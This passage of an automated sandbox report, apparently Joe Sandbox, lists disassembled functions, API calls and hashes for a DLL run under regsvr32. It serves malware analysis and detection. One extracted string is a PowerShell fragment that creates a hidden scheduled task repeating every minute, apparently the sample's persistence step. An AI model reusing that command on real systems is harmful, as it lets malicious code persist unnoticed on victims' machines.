                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoPerformance
                                                                    • String ID: @
                                                                    • API String ID: 3070290716-2766056989
                                                                    • Opcode ID: f62ca9aa1ecd407958618594fd8f5d881816df793d774b0212e8ce3adadf7aaa
                                                                    • Instruction ID: cf5f8ed0d4802c1a68c6391d4c12ee7466bb4b99522bde3a1b0ae7f9444f5b97
                                                                    • Opcode Fuzzy Hash: f62ca9aa1ecd407958618594fd8f5d881816df793d774b0212e8ce3adadf7aaa
                                                                    • Instruction Fuzzy Hash: 26317221A18AC181F7724728A4067E6A3B4BFD5368F405320EFDC867A9EF3DD1C68B40
                                                                    Function 00007FFDFB21D840 Relevance: 3.2, APIs: 2, Instructions: 187timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Process$OpenTimes
                                                                    • String ID:
                                                                    • API String ID: 7699560-0
                                                                    • Opcode ID: b82240550894807557adba87751f104dd04fd2f0f4657b4aa3b1416aed29df14
                                                                    • Instruction ID: 67c7f57940c4f33f2702c449b933a9ffb42ea5e8e6e737045ce916c5c79f65ff
                                                                    • Opcode Fuzzy Hash: b82240550894807557adba87751f104dd04fd2f0f4657b4aa3b1416aed29df14
                                                                    • Instruction Fuzzy Hash: FF818822B19BC282E7549F25A4507AA73A0FB857D4F149235EFEE467E9DF7DE0848300
                                                                    Function 00007FFDFB2B98D0 Relevance: 3.1, APIs: 2, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,00000000,00000000,?,?,00000000,?,00007FFDFB26469D), ref: 00007FFDFB2B994B
                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,?,00007FFDFB26469D), ref: 00007FFDFB2B9955
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastWait
                                                                    • String ID:
                                                                    • API String ID: 1574541344-0
                                                                    • Opcode ID: be802b39141b6e89c3fe4a15301ed45f445826f3c101ad4fe0dc9e06537fb618
                                                                    • Instruction ID: 049284c6aa9b5c1b2d949aa119ba650cf77239ef0c486fd3e6cde043594010c4
                                                                    • Opcode Fuzzy Hash: be802b39141b6e89c3fe4a15301ed45f445826f3c101ad4fe0dc9e06537fb618
                                                                    • Instruction Fuzzy Hash: 0A21B432B1A5138AFB658A65D821DBD2761AB41798F14C035DE6E9B6E8CF3C9442CB40
                                                                    Function 00007FFDFB20ED90 Relevance: 3.1, APIs: 2, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCounterQueryRemove
                                                                    • String ID:
                                                                    • API String ID: 2370987109-0
                                                                    • Opcode ID: 3f194e0851a387f7221e734b812e9f26989468eb3d51d0d61b18c8102ab6eb93
                                                                    • Instruction ID: 9840c052b17f8ea1f0aaa08a3dd8e1c10837ae03ad29f116b3bd4ac4a81b2e17
                                                                    • Opcode Fuzzy Hash: 3f194e0851a387f7221e734b812e9f26989468eb3d51d0d61b18c8102ab6eb93
                                                                    • Instruction Fuzzy Hash: 1B21CB22F1AA4745EB50BE2594257796290DF90BE4F1C4331EABEC27E9EF28D4828300
                                                                    Function 00007FFDFB263C70 Relevance: 2.7, APIs: 2, Instructions: 151COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID:
                                                                    • API String ID: 3510742995-0
                                                                    • Opcode ID: a80c4003dfca4faebbf20991140aa97795faae2c77e3fc64f026f07f84bba51e
                                                                    • Instruction ID: a22fcf385e61a0126a7534f13b02b130b02a59add13c2386d4ddd40a63f706c4
                                                                    • Opcode Fuzzy Hash: a80c4003dfca4faebbf20991140aa97795faae2c77e3fc64f026f07f84bba51e
                                                                    • Instruction Fuzzy Hash: 2A61D422B09BC285E7219B19A4507FA67A0FB597A4F149335EEFC467E9DF3CE0858700
                                                                    Function 00007FFDFB20BC70 Relevance: 2.6, APIs: 2, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$ProcessTimes
                                                                    • String ID:
                                                                    • API String ID: 3369102921-0
                                                                    • Opcode ID: 499b30c56d909fa245b807015587a909bc6e568012296101aa17a009de191db5
                                                                    • Instruction ID: abd2a09eb8022c329507bfea5af67943f6725d988b688d261b846f5d3330abe7
                                                                    • Opcode Fuzzy Hash: 499b30c56d909fa245b807015587a909bc6e568012296101aa17a009de191db5
                                                                    • Instruction Fuzzy Hash: CE31C122B09A8582E7318B15B901AAEE370FBA8794F084121EFED137A5DF3CE1848740
                                                                    Function 00007FFDFB262E00 Relevance: 2.6, APIs: 2, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID:
                                                                    • API String ID: 3510742995-0
                                                                    • Opcode ID: 5a6f68c738c57fa078303cac470eb9da5d5a764b24dd4cbd379faab9850ccb6b
                                                                    • Instruction ID: b2008e57699397be0ba29e84959469368dc0ea977d489200e17f2b8d5d8a42b1
                                                                    • Opcode Fuzzy Hash: 5a6f68c738c57fa078303cac470eb9da5d5a764b24dd4cbd379faab9850ccb6b
                                                                    • Instruction Fuzzy Hash: 8C319622E09AC685F720AB14E4513FAA7A0FB98394F449335DAEC427DADF3CE1958740
                                                                    Function 00007FFDFB21FD30 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: QueryVirtual
                                                                    • String ID:
                                                                    • API String ID: 1804819252-0
                                                                    • Opcode ID: b372edb0a258e6b97ae2eb944439a346aae665cc869136da0d98477599e02d95
                                                                    • Instruction ID: dd3338b53383cec5a46c00ddc9824bc9f6ea76cf44e9847654ad91861a2d06f0
                                                                    • Opcode Fuzzy Hash: b372edb0a258e6b97ae2eb944439a346aae665cc869136da0d98477599e02d95
                                                                    • Instruction Fuzzy Hash: 0D71D322B0A64391EB209B11D420B7AA761BF55BD0F585636DE7E87BEDDF7CE2418300
                                                                    Function 00007FFDFB220D8C Relevance: 1.4, APIs: 1, Instructions: 188COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 1915069931-0
                                                                    • Opcode ID: b125d7cbe2ed47b59a401ecfbabacdc7d9d9a2e2ac67f7f5e1e7e73b58fea5ed
                                                                    • Instruction ID: c73de8275a88f8b8fb303f6ee5285c1181fe1c00f50d74cad2b186dfabec0820
                                                                    • Opcode Fuzzy Hash: b125d7cbe2ed47b59a401ecfbabacdc7d9d9a2e2ac67f7f5e1e7e73b58fea5ed
                                                                    • Instruction Fuzzy Hash: 68914C62B0EAC284EB749B01E051BEBA361FB847C4F848431DE9D87AADDF6DD1848740
                                                                    Function 00007FFDFB22403A Relevance: 1.4, APIs: 1, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CaptureContextExceptionRaiseUnwindabortmemcpy
                                                                    • String ID:
                                                                    • API String ID: 3394368889-0
                                                                    • Opcode ID: dcf6e42176257190d2ea28c84ae0f5ad6bae0c4b1c7225c15cdac4997257e49a
                                                                    • Instruction ID: b54882c469696f24675ddd59b745b1b118321787982720528e3eeba2768a97f1
                                                                    • Opcode Fuzzy Hash: dcf6e42176257190d2ea28c84ae0f5ad6bae0c4b1c7225c15cdac4997257e49a
                                                                    • Instruction Fuzzy Hash: 3451F522709B8681FB258B15E501BA9A770FF95BC4F845121EFAC57BA9DF3CE081C700
                                                                    Function 00007FFDFB224049 Relevance: 1.4, APIs: 1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CaptureContextExceptionRaiseUnwindabortmemcpy
                                                                    • String ID:
                                                                    • API String ID: 3394368889-0
                                                                    • Opcode ID: 29c59bfd3d6a36017537bf692beed53b5e9baf39cecaae161d8e311c31c14ee0
                                                                    • Instruction ID: f0e8a5dbbff845d12131f02db3025ee8a01d8a0b493745aba0536c9290133b94
                                                                    • Opcode Fuzzy Hash: 29c59bfd3d6a36017537bf692beed53b5e9baf39cecaae161d8e311c31c14ee0
                                                                    • Instruction Fuzzy Hash: 6A51E422B19A8681FB258F19E401BE9A760FF95B84F845121EFAC577A9DF3DE0818700
                                                                    Function 00007FFDFB20F090 Relevance: 1.4, APIs: 1, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp
                                                                    • String ID:
                                                                    • API String ID: 1475443563-0
                                                                    • Opcode ID: 484252aaa7a447837e4c2c39fcd1ac803d7f0dd6a1f956475b7de7b5046d59a3
                                                                    • Instruction ID: 573495821e32f85ae958cd8da49d34f373f053210d7fc3281904d0aaef7dbee3
                                                                    • Opcode Fuzzy Hash: 484252aaa7a447837e4c2c39fcd1ac803d7f0dd6a1f956475b7de7b5046d59a3
                                                                    • Instruction Fuzzy Hash: 1841E827B19B8281E7109B1AE41076AE360FF957D4F184232EFDDA36A9EF3CD6458700
                                                                    Function 00007FFDFB21CED0 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: 68da43908b9d5c6d8e58e5f0b8461580bb4fe132dd54bd1c91f095dce0a33760
                                                                    • Instruction ID: 9ac362070b51fd1769a8f16e0bc81aa7137beccd032b7c59029050f5ba19db27
                                                                    • Opcode Fuzzy Hash: 68da43908b9d5c6d8e58e5f0b8461580bb4fe132dd54bd1c91f095dce0a33760
                                                                    • Instruction Fuzzy Hash: FE314D59B0A64B12EF04DB1659106B652816B09BF0FA05B32CE7D8F7E8DE3CE1058300

                                                                    Non-executed Functions

                                                                    Function 00007FFDFB206890 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 472librarynativeloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleInformationModuleProcQuery$ExceptionHandlerLibraryLoadProcessSystemVectoredmemcpymemset
                                                                    • String ID: called `Result::unwrap()` on an `Err` value$ymR:
                                                                    • API String ID: 4247985971-3140955088
                                                                    • Opcode ID: 772a93542f744c3f37992e2da3216b7894e6f1b7ab3045b291bba1e61d04605e
                                                                    • Instruction ID: cb9e8912b9b5dc4bb96cdc6bd01b615428802783ae18f77dfa433c859cd6622d
                                                                    • Opcode Fuzzy Hash: 772a93542f744c3f37992e2da3216b7894e6f1b7ab3045b291bba1e61d04605e
                                                                    • Instruction Fuzzy Hash: E5327D2271AB8282E7219B15E460BAAA7A0FB85784F484135EEDD47BE9DF7DE045C700
                                                                    Function 00007FFDFB22B9F0 Relevance: 24.5, APIs: 16, Instructions: 465COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: User$EnumInfo
                                                                    • String ID:
                                                                    • API String ID: 2388768862-0
                                                                    • Opcode ID: 3039e20b0ed68ae4d2ab150ae0e976aec51ac587ed886270c5d83566efbef080
                                                                    • Instruction ID: 1365d4953a4040d3f1208b8bdcf4aebaf16190f1b5d762e922b4d2a63f6478fc
                                                                    • Opcode Fuzzy Hash: 3039e20b0ed68ae4d2ab150ae0e976aec51ac587ed886270c5d83566efbef080
                                                                    • Instruction Fuzzy Hash: CE224E26B0ABC681EB709B15E4507EAA3A0FB84B84F844135DEAD87BADDF3CD545C740
                                                                    Function 00007FFDFB2060E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 352libraryloadersynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • L ") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName '' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries), xrefs: 00007FFDFB206235
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad$CreateEventHandleModuleObjectSingleWait
